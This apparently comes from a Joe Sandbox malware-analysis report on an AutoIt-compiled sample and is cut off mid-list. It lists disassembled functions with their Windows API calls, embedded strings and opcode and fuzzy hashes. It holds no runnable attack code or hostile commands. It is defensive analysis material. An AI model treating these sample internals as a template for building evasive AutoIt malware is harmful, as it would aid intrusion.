                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: b49db4e4ea43c64ea8319249018e33f5db9ff9ee5979b7ac48491fa8b8656ec3
                                                                          • Instruction ID: 4dc3d6ffc07a8c60d92b4747869438676cb2adbdc816d6b0e8d4906203acbbdd
                                                                          • Opcode Fuzzy Hash: b49db4e4ea43c64ea8319249018e33f5db9ff9ee5979b7ac48491fa8b8656ec3
                                                                          • Instruction Fuzzy Hash: 6A5181B5649A05EA8B27EB10CD52EFD7364EB88700B21C45BE40BEB6D0DB359E41DB43
                                                                          Function 003168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-86951937
                                                                          • Opcode ID: 522a77efc806911c45778e3396a709c6daa65a637030bb8088e06740af55fccb
                                                                          • Instruction ID: 4dab4e79664f39aa9202b834c4e2cb0735ef246d4a7d1a10c7d9fbc6166b93b8
                                                                          • Opcode Fuzzy Hash: 522a77efc806911c45778e3396a709c6daa65a637030bb8088e06740af55fccb
                                                                          • Instruction Fuzzy Hash: D481E6B1640205ABCB1BAFA4DC83FFF77ACAF19700F044024F905AF192EB61DA95C661
                                                                          Function 0039A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0039A903
                                                                          • SetTextColor.GDI32(?,?), ref: 0039A907
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0039A91D
                                                                          • GetSysColor.USER32(0000000F), ref: 0039A928
                                                                          • CreateSolidBrush.GDI32(?), ref: 0039A92D
                                                                          • GetSysColor.USER32(00000011), ref: 0039A945
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039A953
                                                                          • SelectObject.GDI32(?,00000000), ref: 0039A964
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0039A96D
                                                                          • SelectObject.GDI32(?,?), ref: 0039A97A
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0039A999
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039A9B0
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0039A9C5
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039A9ED
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0039AA14
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0039AA32
                                                                          • DrawFocusRect.USER32(?,?), ref: 0039AA3D
                                                                          • GetSysColor.USER32(00000011), ref: 0039AA4B
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0039AA53
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0039AA67
                                                                          • SelectObject.GDI32(?,0039A5FA), ref: 0039AA7E
                                                                          • DeleteObject.GDI32(?), ref: 0039AA89
                                                                          • SelectObject.GDI32(?,?), ref: 0039AA8F
                                                                          • DeleteObject.GDI32(?), ref: 0039AA94
                                                                          • SetTextColor.GDI32(?,?), ref: 0039AA9A
                                                                          • SetBkColor.GDI32(?,?), ref: 0039AAA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: 2ead0e4469928fb4b32973ec19b2a2590076e946e671f25fada6bc64c49f3751
                                                                          • Instruction ID: 6726cdc85b92ac0dc8b01b69b9e98afc2b159a83581ec178febe5973485723ee
                                                                          • Opcode Fuzzy Hash: 2ead0e4469928fb4b32973ec19b2a2590076e946e671f25fada6bc64c49f3751
                                                                          • Instruction Fuzzy Hash: B2511C71900618EFDF129FA4DC48EAE7BBDFB48320F114626F911EB2A1D7769940DB90
                                                                          Function 003989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00398AC1
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00398AD2
                                                                          • CharNextW.USER32(0000014E), ref: 00398B01
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00398B42
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00398B58
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00398B69
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00398B86
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00398BD8
                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00398BEE
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00398C1F
                                                                          • _memset.LIBCMT ref: 00398C44
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00398C8D
                                                                          • _memset.LIBCMT ref: 00398CEC
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00398D16
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00398D6E
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00398E1B
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00398E3D
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00398E87
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00398EB4
                                                                          • DrawMenuBar.USER32(?), ref: 00398EC3
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00398EEB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          • Opcode ID: 82a386bfddce65f230ac35fe2c85ddb863623b1dde95523f3a924ba2031d6704
                                                                          • Instruction ID: e25b8f4b1c9b2d9dd71e64d01adcd5fcd935cc58dd4aa13e13761ec9f1808a64
                                                                          • Opcode Fuzzy Hash: 82a386bfddce65f230ac35fe2c85ddb863623b1dde95523f3a924ba2031d6704
                                                                          • Instruction Fuzzy Hash: 3AE18071900208AFDF229F64DC84EEE7BBDEF4A710F118156F915AA290DB759A80DF60
                                                                          Function 0039488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 003949CA
                                                                          • GetDesktopWindow.USER32 ref: 003949DF
                                                                          • GetWindowRect.USER32(00000000), ref: 003949E6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00394A48
                                                                          • DestroyWindow.USER32(?), ref: 00394A74
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00394A9D
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00394ABB
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00394AE1
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00394AF6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00394B09
                                                                          • IsWindowVisible.USER32(?), ref: 00394B29
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00394B44
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00394B58
                                                                          • GetWindowRect.USER32(?,?), ref: 00394B70
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00394B96
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00394BB0
                                                                          • CopyRect.USER32(?,?), ref: 00394BC7
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00394C32
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: bb3949e0dc2dd98c76f133b6471d9485d00288524b2591aa559df275aaaff3a3
                                                                          • Instruction ID: c9063ba0fccb8a59c99f3e8a04b7c34272d2a1cde4fc72046be1f3c1068cf88a
                                                                          • Opcode Fuzzy Hash: bb3949e0dc2dd98c76f133b6471d9485d00288524b2591aa559df275aaaff3a3
                                                                          • Instruction Fuzzy Hash: 0BB17A71608340AFDB05DF65C844F6ABBE8BF88310F008A1DF9999B2A1D771EC46CB95
                                                                          Function 003127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003128BC
                                                                          • GetSystemMetrics.USER32(00000007), ref: 003128C4
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003128EF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 003128F7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0031291C
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00312939
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312949
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0031297C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00312990
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003129AE
                                                                          • GetStockObject.GDI32(00000011), ref: 003129CA
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003129D5
                                                                            • Part of subcall function 00312344: GetCursorPos.USER32(?), ref: 00312357
                                                                            • Part of subcall function 00312344: ScreenToClient.USER32(003D57B0,?), ref: 00312374
                                                                            • Part of subcall function 00312344: GetAsyncKeyState.USER32(00000001), ref: 00312399
                                                                            • Part of subcall function 00312344: GetAsyncKeyState.USER32(00000002), ref: 003123A7
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00311256), ref: 003129FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          • Opcode ID: d366fef69a4a6cb74a627dc12b667b52e62f644f19966ce6559acde9f13506f8
                                                                          • Instruction ID: 77f83916bcbcf14d2181d83a8156c0fc46ce55007da935440966affc4668a09f
                                                                          • Opcode Fuzzy Hash: d366fef69a4a6cb74a627dc12b667b52e62f644f19966ce6559acde9f13506f8
                                                                          • Instruction Fuzzy Hash: C3B12D7160120ADFDB16DFA8DC45BEE7BB9FB08311F11412AFA15EB290DB74A851CB50
                                                                          Function 0034A8CB Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 211COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                          • String ID: {n3${n3
                                                                          • API String ID: 884005220-2485546804
                                                                          • Opcode ID: a265f998ea131342b5c749ca41cd46c03aeac96f4c103666b2c8dd3e6a689074
                                                                          • Instruction ID: 1f52677e7f818d8e3fbb12664b26554e95e580ed77412f73078670b2cc596555
                                                                          • Opcode Fuzzy Hash: a265f998ea131342b5c749ca41cd46c03aeac96f4c103666b2c8dd3e6a689074
                                                                          • Instruction Fuzzy Hash: 4661F372985B16AFDB13AF24D94176A77E8EF01321F224116F801AF191EB34AD41CB93
                                                                          Function 0036A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0036A47A
                                                                          • __swprintf.LIBCMT ref: 0036A51B
                                                                          • _wcscmp.LIBCMT ref: 0036A52E
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0036A583
                                                                          • _wcscmp.LIBCMT ref: 0036A5BF
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0036A5F6
                                                                          • GetDlgCtrlID.USER32(?), ref: 0036A648
                                                                          • GetWindowRect.USER32(?,?), ref: 0036A67E
                                                                          • GetParent.USER32(?), ref: 0036A69C
                                                                          • ScreenToClient.USER32(00000000), ref: 0036A6A3
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0036A71D
                                                                          • _wcscmp.LIBCMT ref: 0036A731
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0036A757
                                                                          • _wcscmp.LIBCMT ref: 0036A76B
                                                                            • Part of subcall function 0033362C: _iswctype.LIBCMT ref: 00333634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: 74212d912e377c50d73eed659734a844077cc5b20745c45e02a17d1e3c23f866
                                                                          • Instruction ID: 72c8e72c0c3999cc4e15381dee482bd297075137118f8c941762ea21dbffa7fd
                                                                          • Opcode Fuzzy Hash: 74212d912e377c50d73eed659734a844077cc5b20745c45e02a17d1e3c23f866
                                                                          • Instruction Fuzzy Hash: B2A1E031204B06AFD716DF64C884BAAB7E8FF44351F00C629F99AE6194DB30E955CF92
                                                                          Function 0036AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0036AF18
                                                                          • _wcscmp.LIBCMT ref: 0036AF29
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0036AF51
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0036AF6E
                                                                          • _wcscmp.LIBCMT ref: 0036AF8C
                                                                          • _wcsstr.LIBCMT ref: 0036AF9D
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0036AFD5
                                                                          • _wcscmp.LIBCMT ref: 0036AFE5
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0036B00C
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0036B055
                                                                          • _wcscmp.LIBCMT ref: 0036B065
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0036B08D
                                                                          • GetWindowRect.USER32(00000004,?), ref: 0036B0F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: a891e9ebbcd90ad7eceb9bc180ca89269607eaabf927188e69594325ace92e63
                                                                          • Instruction ID: 749e3b0413340fde1edde1f2e86a71541138bad31b4c634035eda048ca7ece69
                                                                          • Opcode Fuzzy Hash: a891e9ebbcd90ad7eceb9bc180ca89269607eaabf927188e69594325ace92e63
                                                                          • Instruction Fuzzy Hash: E9819E71108205AFDB06DF14C885BAABBE8EF45354F04C46AFD85DA09ADB34DD85CFA2
                                                                          Function 0039C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0039C627
                                                                            • Part of subcall function 0039AB37: ClientToScreen.USER32(?,?), ref: 0039AB60
                                                                            • Part of subcall function 0039AB37: GetWindowRect.USER32(?,?), ref: 0039ABD6
                                                                            • Part of subcall function 0039AB37: PtInRect.USER32(?,?,0039C014), ref: 0039ABE6
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0039C690
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0039C69B
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0039C6BE
                                                                          • _wcscat.LIBCMT ref: 0039C6EE
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0039C705
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0039C71E
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0039C735
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0039C757
                                                                          • DragFinish.SHELL32(?), ref: 0039C75E
                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0039C851
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb=
                                                                          • API String ID: 169749273-3242401288
                                                                          • Opcode ID: 1a80e39e2e4b636b29d65d912eff47aad262b190c8a7657944ad8657d98c4cc8
                                                                          • Instruction ID: 3ab279cfd41918ff23cc3350265a5aaab3e157d431f026c4b669eb64fa965f69
                                                                          • Opcode Fuzzy Hash: 1a80e39e2e4b636b29d65d912eff47aad262b190c8a7657944ad8657d98c4cc8
                                                                          • Instruction Fuzzy Hash: EB615D71108301AFCB06EF64DC85EAFBBF8EF89710F10092EF595961A1DB719A49CB52
                                                                          Function 0036ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
                                                                          • Opcode ID: 2ca75ac97cbf27c3b5bd05bc4619f62f87fe5dbeb6572b299de2513d081d7a4c
                                                                          • Instruction ID: b9126bade5ba1227c18d2461ce7153684d768c4c85951fa0a6f2aeeacabe7d5b
                                                                          • Opcode Fuzzy Hash: 2ca75ac97cbf27c3b5bd05bc4619f62f87fe5dbeb6572b299de2513d081d7a4c
                                                                          • Instruction Fuzzy Hash: 4731B035948609AACB1BEB50DD43FEE77B8AB14750F204028F802F91D5EF516F048E52
                                                                          Function 00384FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00385013
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0038501E
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00385029
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00385034
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0038503F
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0038504A
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00385055
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00385060
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0038506B
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00385076
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00385081
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0038508C
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00385097
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 003850A2
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 003850AD
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003850B8
                                                                          • GetCursorInfo.USER32(?), ref: 003850C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
